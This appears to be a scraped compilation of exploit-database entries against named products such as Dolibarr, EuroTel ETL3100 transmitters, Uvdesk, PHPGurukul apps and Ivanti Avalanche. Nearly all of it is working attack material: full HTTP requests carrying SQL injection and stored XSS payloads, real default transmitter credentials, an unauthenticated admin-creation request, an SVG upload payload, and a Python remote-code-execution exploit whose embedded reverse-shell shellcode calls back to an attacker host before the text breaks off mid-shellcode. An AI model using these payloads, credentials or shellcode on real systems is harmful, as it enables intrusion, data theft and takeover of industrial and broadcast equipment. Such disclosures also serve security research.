ISHACK AI BOT

# Exploit Title: Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions Privilege Escalation # Date: 2023-08-09 # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia # Vendor Homepage: https://www.inosoft.com/ # Version: Up to 2022-2.1 (Runtime RT7.3 RC3 20221209.5) # Tested on: Windows # CVE: CVE-2023-31468 Inosoft VisiWin is a completely open system with a configurable range of functions. It combines all features of classic HMI software with unlimited programming possibilities. The installation of the solution will create insecure folder, and this could allow a malicious user to manipulate file content or change legitimate files (e.g., VisiWin7.Server.Manager.exe which runs with SYSTEM privileges) to compromise a system or to gain elevated privileges. This is the list of insecure files and folders with their respective permissions: C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH" C:\Program Files (x86)\INOSOFT GmbH BUILTIN\Administrators:(OI)(CI)(F) Everyone:(OI)(CI)(F) NT AUTHORITY\SYSTEM:(OI)(CI)(F) Successfully processed 1 files; Failed processing 0 files C:\> -------------------------------------------------------------------------------------------------------------------------------------------------------- C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH\VisiWin7\Runtime\VisiWin7.Server.Manager.exe" C:\Program Files (x86)\INOSOFT GmbH\VisiWin 7\Runtime\VisiWin7.Server.Manager.exe BUILTIN\Administrators:(I)(F) Everyone:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) Successfully processed 1 files; Failed processing 0 files C:\>

# Exploit Title: Dolibarr Version 17.0.1 - Stored XSS # Dork: # Date: 2023-08-09 # Exploit Author: Furkan Karaarslan # Category : Webapps # Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php # Version: 17.0.1 (REQUIRED) # Tested on: Windows/Linux # CVE : ----------------------------------------------------------------------------- Requests POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 599 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht Connection: close token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir

#Exploit Title: EuroTel ETL3100 Transmitter Default Credentials # Exploit Author: LiquidWorm Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L Product web page: https://www.eurotel.it | https://www.siel.fm Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter) Summary: RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission. Desc: The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system. Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3) lighttpd/1.4.26 PHP/5.4.3 Xilinx Virtex Machine Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5782 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php 29.04.2023 -- Using Username "user" and Password "etl3100rt1234" the operator will enter in the WEB interface in a read-only mode. Using Username "operator" and Password "2euro21234" the operator will be able also to modify some parameters in the WEB pages.

# Exploit Title: EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR) # Exploit Author: LiquidWorm Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L Product web page: https://www.eurotel.it | https://www.siel.fm Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter) Summary: RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission. Desc: The application is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities. Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3) lighttpd/1.4.26 PHP/5.4.3 Xilinx Virtex Machine Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5783 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php 29.04.2023 -- See URL: TARGET/exciter.php?page=0 TARGET/exciter.php?page=1 TARGET/exciter.php?page=2 ... ... TARGET/exciter.php?page=29 TARGET/exciter.php?page=30 TARGET/exciter.php?page=31

# Exploit Title: EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download # Exploit Author: LiquidWorm Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L Product web page: https://www.eurotel.it | https://www.siel.fm Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter) Summary: RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission. Desc: The TV and FM transmitter suffers from an unauthenticated configuration and log download vulnerability. This will enable the attacker to disclose sensitive information and help him in authentication bypass, privilege escalation and full system access. Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3) lighttpd/1.4.26 PHP/5.4.3 Xilinx Virtex Machine Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5784 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php 29.04.2023 -- $ curl http://192.168.2.166/cfg_download.php -o config.tgz $ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz

# Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) # Date: 11.08.2023 # Exploit Author: 0xBr # Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008 # Version: <=9.5 # CVE: CVE-2023-37759 POST /en/user/register HTTP/2 Host: localhost Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 756 _token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register

# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities # Date: 09/08/2023 # Exploit Author: Kerimcan Ozturk # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/business-directory-script/ # Version: 3.2 # Tested on: Windows 10 Pro ## Description Technical Detail / POC ========================== Login Account Go to Property Page ( https://website/index.php?controller=pjAdminListings&action=pjActionUpdate) Edit Any Property ( https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57 ) [1] Cross-Site Scripting (XSS) Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id= "<script><image/src/onerror=prompt(8)> [2] Cross-Site Request Forgery Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id= "<script><font%20color="green">Kerimcan%20Ozturk</font> Best Regards

# Exploit Title: Color Prediction Game v1.0 - SQL Injection # Date: 2023-08-12 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script # Tested on: Kali Linux & MacOS # CVE: N/A ### Request ### POST /loginNow.php HTTP/1.1 Host: localhost Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------395879129218961020344050490865 Content-Length: 434 Origin: http://localhost Referer: http://localhost/login.php Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="login_mobile" 4334343433 -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="login_password" 123456 -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="action" login -----------------------------395879129218961020344050490865-- ### Parameter & Payloads ### Parameter: MULTIPART login_mobile ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="login_mobile" 4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="login_password" 123456 -----------------------------395879129218961020344050490865 Content-Disposition: form-data; name="action" login -----------------------------395879129218961020344050490865--

# Exploit Title: Global - Multi School Management System Express v1.0- SQL Injection # Date: 2023-08-12 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378 # Tested on: Kali Linux & MacOS # CVE: N/A ### Request ### POST /report/balance HTTP/1.1 Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw Accept: */* X-Requested-With: XMLHttpRequest Referer: http://localhost Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f Content-Length: 472 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive ------------YWJkMTQzNDcw Content-Disposition: form-data; name="school_id" 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z ------------YWJkMTQzNDcw Content-Disposition: form-data; name="academic_year_id" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="group_by" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="date_from" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="date_to" ------------YWJkMTQzNDcw-- ### Parameter & Payloads ### Parameter: MULTIPART school_id ((custom) POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: ------------YWJkMTQzNDcw Content-Disposition: form-data; name="school_id" 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT (ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx ------------YWJkMTQzNDcw Content-Disposition: form-data; name="academic_year_id" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="group_by" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="date_from" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="date_to" ------------YWJkMTQzNDcw–

# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection # Date: 2023-08-12 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569 # Tested on: Kali Linux & MacOS # CVE: N/A ### Request ### POST /filter_movies/1 HTTP/2 Host: localhost Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/movies.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 60 Origin: htts://localhost Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1 ### Parameter & Payloads ### Parameter: maximum_rating (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND 2238=2238&page=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT 4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1

# Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection # Date: 2023-08-12 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874 # Tested on: Kali Linux & MacOS # CVE: N/A ### Request ### GET /projects?filter=notstarted HTTP/1.1 Host: localhost Cookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8; ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers Connection: close ### Parameter & Payloads ### Parameter: filter (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQO Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: filter=notstarted' AND EXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT (ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ

# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated) # Google Dork: NA # Date: 19/08/2023 # Exploit Author: Ashutosh Singh Umath # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: 3.0 # Tested on: Windows 11 # CVE : Requested Proof Of Concept: 1. Navigate to the admin login page. URL: http://192.168.1.5/loginsystem/admin/ 2. Enter "*admin' -- -*" in the admin username field and anything random in the password field. 3. Now you successfully logged in as admin. 4. To download all the data from the database, use the below commands. 4.1. Login to the admin portal and capture the request. 4.2. Copy the intercepted request in a file. 4.3. Now use the below command to dump all the data Command: sqlmap -r <file-name> -p username -D loginsystem --dump-all Thanks and Regards, Ashutosh Singh Umath

# Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS) # Google Dork: NA # Date: 19/08/2023 # Exploit Author: Ashutosh Singh Umath # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: 3.0 # Tested on: Windows 11 # CVE : Requested Description User Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable to Persistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed. POC User side 1. Go to the user registration page http://localhost/loginsystem. 2. Enter <img src="x" onerror=alert(document.cookie)> in one of the fields (first name, last name, email, or contact). 3. Click sign up. Admin side 1. Login to admin panel http://localhost/loginsystem/admin. 2. After login successfully go to manage user page. 3. Payload Thanks and Regards, Ashutosh Singh Umath

# Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated) # Date: 14/08/2023 # Exploit Author: Hubert Wojciechowski # Contact Author: [email protected] # Vendor Homepage: https://www.uvdesk.com/ # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 1.1.4 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 # Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion. ## Example XSS Stored in new ticket ----------------------------------------------------------------------------------------------------------------------- Param: reply ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1 Host: 127.0.0.1 Content-Length: 812 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3 Connection: close ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="threadType" forward ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="status" ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="subject" aaaa ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="to[]" [email protected] ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="reply" %3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="pic"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryXCjJcGbgZxZWLsSk Content-Disposition: form-data; name="nextView" stay ------WebKitFormBoundaryXCjJcGbgZxZWLsSk-- ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 302 Found Date: Mon, 14 Aug 2023 11:33:26 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Cache-Control: max-age=0, must-revalidate, private Location: /uvdesk/public/en/member/ticket/view/1 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS Access-Control-Allow-Headers: Access-Control-Allow-Origin Access-Control-Allow-Headers: Authorization Access-Control-Allow-Headers: Content-Type X-Debug-Token: bf1b73 X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73 X-Robots-Tag: noindex Expires: Mon, 14 Aug 2023 11:33:26 GMT Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 398 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" /> <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title> </head> <body> Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>. </body> </html> ----------------------------------------------------------------------------------------------------------------------- Redirect and view response: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Mon, 14 Aug 2023 11:44:14 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Cache-Control: max-age=0, must-revalidate, private Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS Access-Control-Allow-Headers: Access-Control-Allow-Origin Access-Control-Allow-Headers: Authorization Access-Control-Allow-Headers: Content-Type X-Debug-Token: 254ce8 X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8 X-Robots-Tag: noindex Expires: Mon, 14 Aug 2023 11:44:14 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 300607 <!DOCTYPE html> <html> <head> <title>#1 vvvvvvvvvvvvvvvvvvvvv</title> [...] <p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p> [...] ----------------------------------------------------------------------------------------------------------------------- XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.

# Exploit Title: Blood Donor Management System v1.0 - Stored XSS # Application: Blood Donor Management System # Version: v1.0 # Bugs: Stored XSS # Technology: PHP # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/ # Date: 15.08.2023 # Author: Ehlullah Albayrak # Tested on: Windows #POC ======================================== 1. Login to user account 2. Go to Profile 3. Change "State" input and add "<script>alert("xss")</script>" payload. 4. Go to http://localhost/blood/welcome page and search "O", XSS will be triggered. #Payload: <script>alert("xss")</script>

# Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload # Exploit Author: CraCkEr # Date: 30/07/2023 # Vendor: tdevs # Vendor Homepage: https://tdevs.co/ # Software Link: https://hyiprio-feature.tdevs.co/ # Version: 2.1 # Tested on: Windows 10 Pro # Impact: Allows User to upload files to the web server # CVE: CVE-2023-4382 ## Description Allows Attacker to upload malicious files onto the server, such as Stored XSS ## Steps to Reproduce: 1. Login as a [Normal User] 2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings 3. Upload any Image into the [avatar] 4. Capture the POST Request with [Burp Proxy Intercept] 5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] ----------------------------------------------------------- POST /user/settings/profile-update HTTP/2 Content-Disposition: form-data; name="avatar"; filename="XSS.svg" Content-Type: image/png <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS by Skalvin"); </script> </svg> ----------------------------------------------------------- 6. Send the Request 7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link 8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg [-] Done

""" Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution Date: 2023-08-16 Exploit Author: Robel Campbell (@RobelCampbell) Vendor Homepage: https://www.ivanti.com/ Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/ Version: v6.4.0.0 Tested on: Windows 11 21H2 CVE: CVE-2023-32560 Reference: https://www.tenable.com/security/research/tra-2023-27 """ import socket import struct import sys # Create an item structure for the header and payload class Item: def __init__(self, type_, name, value): self.type = type_ self.name = name.encode() self.value = value self.name_size = 0x5 self.value_size = 0x800 def pack(self): return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size), self.type, self.name_size, self.value_size, self.name, self.value) # Create a header structure class HP: def __init__(self, hdr, payload): self.hdr = hdr self.payload = payload self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16) def pack(self): return b''.join([item.pack() for item in self.hdr]) + \ b''.join([item.pack() for item in self.payload]) + self.pad # Create a preamble structure class Preamble: def __init__(self, hp): self.msg_size = len(hp.pack()) + 16 self.hdr_size = sum([len(item.pack()) for item in hp.hdr]) self.payload_size = sum([len(item.pack()) for item in hp.payload]) self.unk = 0 # Unknown value def pack(self): return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk) # Create a message structure class Msg: def __init__(self, hp): self.pre = Preamble(hp) self.hdrpay = hp def pack(self): return self.pre.pack() + self.hdrpay.pack() # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python shellcode = b"" shellcode += b"fce8820000006089e531c064" shellcode += b"8b50308b520c8b52148b7228" shellcode += b"0fb74a2631ffac3c617c022c" shellcode += b"20c1cf0d01c7e2f252578b52" shellcode += b"108b4a3c8b4c1178e34801d1" shellcode += b"518b592001d38b4918e33a49" shellcode += b"8b348b01d631ffacc1cf0d01" shellcode += b"c738e075f6037df83b7d2475" shellcode += b"e4588b582401d3668b0c4b8b" shellcode += b"581c01d38b048b01d0894424" shellcode += b"245b5b61595a51ffe05f5f5a" shellcode += b"8b12eb8d5d68333200006877" shellcode += b"73325f54684c772607ffd5b8" shellcode += b"9001000029c454506829806b" shellcode += b"00ffd5505050504050405068" shellcode += b"ea0fdfe0ffd5976a0568c0a8" shellcode += b"561e680200115c89e66a1056" shellcode += b"576899a57461ffd585c0740c" shellcode += 